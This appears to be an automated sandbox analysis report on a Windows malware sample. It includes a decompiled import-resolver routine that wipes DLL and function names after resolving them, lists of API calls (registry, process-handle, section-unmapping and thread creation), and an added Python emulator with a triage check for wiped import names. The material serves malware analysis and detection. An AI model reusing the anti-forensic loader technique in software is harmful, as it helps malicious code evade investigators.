				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;                      /* status = 0 */
				_t33 =  *((intOrPtr*)(_a4 + 0x80));            /* RVA of the import directory */
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;                           /* first IMAGE_IMPORT_DESCRIPTOR */
				_t23 =  *((intOrPtr*)(_t34 + 0xc));            /* descriptor.Name (RVA of the DLL name) */
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;                        /* DLL name as a pointer */
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;                                 /* falls through to _v16 = 0x7e below */
					}
					memset(_t44, 0, lstrlenA(_t44));           /* wipe the DLL name once the module is loaded */
					_t27 =  *_t34;                             /* descriptor.OriginalFirstThunk (import name table) */
					_t35 =  *((intOrPtr*)(_t34 + 0x10));       /* descriptor.FirstThunk (IAT) */
					_t50 =  &(_t50[3]);                        /* stack cleanup after the cdecl calls (decompiler artifact) */
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;                    /* current name-table entry */
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); /* Name field of the next descriptor (0x14 + 0xc) */
							_t34 = _t34 + 0x14;                /* sizeof(IMAGE_IMPORT_DESCRIPTOR) */
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;              /* IAT minus name-table pointer: IAT slot = entry + _v8 */
						_t57 = _t28;
						L8:                                    /* the decompiler emitted this label twice; one copy kept */
						if(_t57 < 0) {                         /* high bit set (ordinal flag or an absolute pointer); branch only partly recovered */
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) { /* outside [base, base + SizeOfImage) */
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;                /* RVA of IMAGE_IMPORT_BY_NAME to pointer */
						}
						_t11 = _t28 + 2; // 0x2: skip the 16-bit Hint, leaving the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));   /* wipe the function name once it is resolved */
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;                  /* store the resolved address in the IAT slot */
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;                           /* ERROR_PROC_NOT_FOUND; the next DLL is still processed */
						goto L19;
					}
					_t27 = _t35;                               /* no name table: walk the IAT itself */
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;                                   /* ERROR_MOD_NOT_FOUND */
				goto L22;
			}

Per-line instruction addresses for the listing above (a side column of the report, 0x00401389 .. 0x00401483; the column is no longer aligned with the C lines in this extraction).

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
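The decompiled routine E00401389 above is a hand-rolled import resolver. As an added illustration (editor's example, not code from the report or from the sample), the Python below parses the same structures on a constructed, flat 32-bit PE image (RVA equals offset, as in a memory dump) and then re-runs the loop's logic with a dictionary standing in for LoadLibraryA and GetProcAddress, so the two visible effects of the routine can be checked: the IAT slots receive the resolved addresses, and every DLL and function name string is zeroed afterwards. `wiped_descriptor_count` is the triage check that follows from that: an import table whose name strings are empty is what this loader leaves behind in memory. The sample image, the resolver dictionary and any addresses passed through it are constructed for the example; the partially recovered negative-thunk branch of the decompiled code is not reproduced.

```python
import struct

# Offsets from IMAGE_NT_HEADERS32 that the decompiled routine reads.
IMPORT_DIR_RVA_OFF = 0x80   # OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
SIZE_OF_IMAGE_OFF = 0x50    # OptionalHeader.SizeOfImage
DESC_SIZE = 0x14            # sizeof(IMAGE_IMPORT_DESCRIPTOR); Name at +0x0c, FirstThunk at +0x10
ORDINAL_FLAG32 = 0x80000000
ERROR_MOD_NOT_FOUND = 0x7E  # returned by the routine when LoadLibraryA fails
ERROR_PROC_NOT_FOUND = 0x7F # returned by the routine when GetProcAddress fails

def _u32(img, off): return struct.unpack_from("<I", img, off)[0]

def _cstr(img, off): return img[off:img.index(b"\x00", off)].decode("ascii", "replace")

def _wipe(buf, off):
    """memset(p, 0, lstrlenA(p)): the step that removes a name string from memory."""
    n = buf.index(b"\x00", off) - off
    buf[off:off + n] = b"\x00" * n

def walk_imports(img):
    """Parse the import directory of a flat (RVA == offset) 32-bit PE image.
    Returns [(dll, [("name", hint, func) | ("ordinal", n), ...]), ...]."""
    nt = _u32(img, 0x3C)                                   # e_lfanew
    if img[nt:nt + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    desc = _u32(img, nt + IMPORT_DIR_RVA_OFF)
    result = []
    while desc and _u32(img, desc + 0x0C):                 # an all-zero descriptor ends the table
        name_rva = _u32(img, desc + 0x0C)
        thunk = _u32(img, desc) or _u32(img, desc + 0x10)  # name table, else the IAT (same fallback as above)
        entries = []
        while thunk:
            t = _u32(img, thunk)
            if t == 0:
                break
            if t & ORDINAL_FLAG32:
                entries.append(("ordinal", t & 0xFFFF))
            else:                                          # IMAGE_IMPORT_BY_NAME: WORD Hint, then the name
                entries.append(("name", struct.unpack_from("<H", img, t)[0], _cstr(img, t + 2)))
            thunk += 4
        result.append((_cstr(img, name_rva), entries))
        desc += DESC_SIZE
    return result

def emulate_loader(img, resolver):
    """Re-run the decompiled loop on a copy of the image; resolver is {dll: {name_or_ordinal: address}}
    standing in for LoadLibraryA/GetProcAddress. Returns (new_image, status, [(iat_slot_rva, address)])."""
    out = bytearray(img)
    nt = _u32(img, 0x3C)
    desc = _u32(img, nt + IMPORT_DIR_RVA_OFF)
    status, writes = 0, []
    while desc and _u32(img, desc + 0x0C):
        name_rva = _u32(img, desc + 0x0C)
        dll = _cstr(img, name_rva)
        if dll not in resolver:                            # LoadLibraryA returned NULL: leave the loop
            return bytes(out), ERROR_MOD_NOT_FOUND, writes
        _wipe(out, name_rva)                               # DLL name is gone once the module is loaded
        int_rva = _u32(img, desc) or _u32(img, desc + 0x10)
        delta = _u32(img, desc + 0x10) - int_rva           # _v8 in the listing: IAT slot = entry + delta
        while int_rva:
            t = _u32(img, int_rva)
            if t == 0:
                break
            key = t & 0xFFFF if t & ORDINAL_FLAG32 else _cstr(img, t + 2)
            addr = resolver[dll].get(key)
            if addr is None:                               # GetProcAddress returned NULL
                status = ERROR_PROC_NOT_FOUND              # remembered, but the next DLL is still processed
                break
            if not t & ORDINAL_FLAG32:
                _wipe(out, t + 2)                          # function name is gone once resolved
            struct.pack_into("<I", out, int_rva + delta, addr)
            writes.append((int_rva + delta, addr))
            int_rva += 4
        desc += DESC_SIZE
    return bytes(out), status, writes

def wiped_descriptor_count(img):
    """Dump triage: descriptors whose DLL name is already empty show a loader like this one has run."""
    return sum(1 for dll, _ in walk_imports(img) if dll == "")

def build_sample_image():
    """Constructed 32-bit PE image (not a real sample): KERNEL32.dll, LoadLibraryA by name plus ordinal 7."""
    img = bytearray(0x600)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                           # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\x00\x00"
    struct.pack_into("<HH", img, nt + 4, 0x14C, 1)                    # Machine = i386, one section
    struct.pack_into("<H", img, nt + 0x18, 0x10B)                     # PE32 magic
    struct.pack_into("<I", img, nt + SIZE_OF_IMAGE_OFF, len(img))
    struct.pack_into("<II", img, nt + IMPORT_DIR_RVA_OFF, 0x200, 2 * DESC_SIZE)
    struct.pack_into("<IIIII", img, 0x200, 0x300, 0, 0, 0x500, 0x340)  # one descriptor, then a zero terminator
    for base in (0x300, 0x340):                                       # name table and IAT start out identical
        struct.pack_into("<III", img, base, 0x400, ORDINAL_FLAG32 | 7, 0)
    struct.pack_into("<H", img, 0x400, 0x2A)                          # IMAGE_IMPORT_BY_NAME.Hint
    img[0x402:0x40F] = b"LoadLibraryA\x00"
    img[0x500:0x50D] = b"KERNEL32.dll\x00"
    return bytes(img)
```

Running `emulate_loader(build_sample_image(), {"KERNEL32.dll": {"LoadLibraryA": 0x7C801D7B, 7: 0x7C80A000}})` (addresses made up) writes the two IAT slots at 0x340 and 0x344 and returns status 0; `walk_imports` on the returned image then yields an empty DLL name and an empty function name with the hint intact, which is the state a memory dump of this sample is in after the routine has run, and `wiped_descriptor_count` reports 1. An empty resolver reproduces the 0x7e path and a resolver missing one function the 0x7f path.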
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
